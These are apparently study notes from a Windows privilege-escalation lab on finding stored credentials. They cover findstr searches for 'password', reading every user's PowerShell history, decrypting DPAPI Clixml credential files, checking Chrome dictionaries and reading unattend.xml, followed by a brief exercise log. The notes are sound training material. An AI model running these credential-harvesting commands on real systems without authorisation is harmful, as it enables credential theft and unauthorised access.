21 - Hunting for Creds

# App Config Files - Despite best practice, apps often store creds in cleartext config files - As one example, sensitive IIS information such as credentials may be stored in a `web.config` file - The default IIS webroot is `C:\inetpub\wwwroot\web.config` ```powershell findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml ``` --- # PowerShell History File - Starting with Powershell 5.0 in Windows 10, PowerShell stores command history to the file: ```txt C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt ``` - However, we can confirm the path with the below ```powershell (Get-PSReadLineOption).HistorySavePath ``` - Now that we know the history file's path, we can attempt to read its contents with `gc` ```powershell gc (Get-PSReadLineOption).HistorySavePath ``` - We can also use the below one-liner to retrieve the contents of all PowerShell history files that the current use is able to access ```powershell foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue} ``` --- # PowerShell Creds - PowerShell creds are often used for scripting and automation tasks as a way to store encrypted credentials conveniently - These creds are protected using [DPAPI](https://en.wikipedia.org/wiki/Data_Protection_API), which typically means they can only be decrypted by the same user on the same computer they were created on - Below is an example, script `Connect-VC.ps1` that a sysadmin created to connect to a vCenter server easily ```powershell # Connect-VC.ps1 # Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml' $encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml' $decryptedPassword = $encryptedPassword.GetNetworkCredential().Password Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword ``` - If we have command execution as the sysadmin or the ability to abuse DPAPI, then we can recover the cleartext creds from `encrypted.xml`, which is referenced in `Connect-VC.ps1` above ```powershell $credential = Import-Clixml -Path 'C:\scripts\pass.xml' $credential.GetNetworkCredential().username bob $credential.GetNetworkCredential().password PASSWORD ``` --- # Dictionary Files - Sensitive information may be entered in an email client or a browser-based application - Below is add example that checks Chrome dictionary files ```powershell gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password ``` --- # Unattended Installation Files - Unattended installation files may define auto-logon settings or additional accounts to be created as part of the installation - Although these files should be automatically deleted as part of the installation, sysadmins may have created copies of the file in other folders during the development of the image file - For example, passwords in the `unattend.xml` are stored in plaintext or base64 encoded as shown below ```xml # unattend.xml <?xml version="1.0" encoding="utf-8"?> <unattend xmlns="urn:schemas-microsoft-com:unattend"> <settings pass="specialize"> <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <AutoLogon> <Password> <Value>local_4dmin_p@ss</Value> <PlainText>true</PlainText> </Password> <Enabled>true</Enabled> <LogonCount>2</LogonCount> <Username>Administrator</Username> </AutoLogon> <ComputerName>*</ComputerName> </component> </settings> ``` --- # Exercise ## initial enum - `ping` test ![[images/Pasted image 20260222204752.png]] - `nmap` scan ![[images/Pasted image 20260222204836.png]] - `rdp` into target with given creds - light internal enum ![[images/Pasted image 20260222204858.png]] ## `htb-student` user - search for files containing `password` > none ![[images/Pasted image 20260222204928.png]] - search chrome dictionary file ![[images/Pasted image 20260222205105.png]] - read powershell history ![[images/Pasted image 20260222205322.png]] - read for all accessible users > same - try search for files containing `password` from `c:\users` ![[images/Pasted image 20260222205831.png]] - `\users\public\documents\settings.xml` looks interesting - here we see a password for `proxyadmin` ## `bob` user - list `\scripts` dir ![[images/Pasted image 20260222210439.png]] - try to decrypt `pass.xml` ![[images/Pasted image 20260222210559.png]]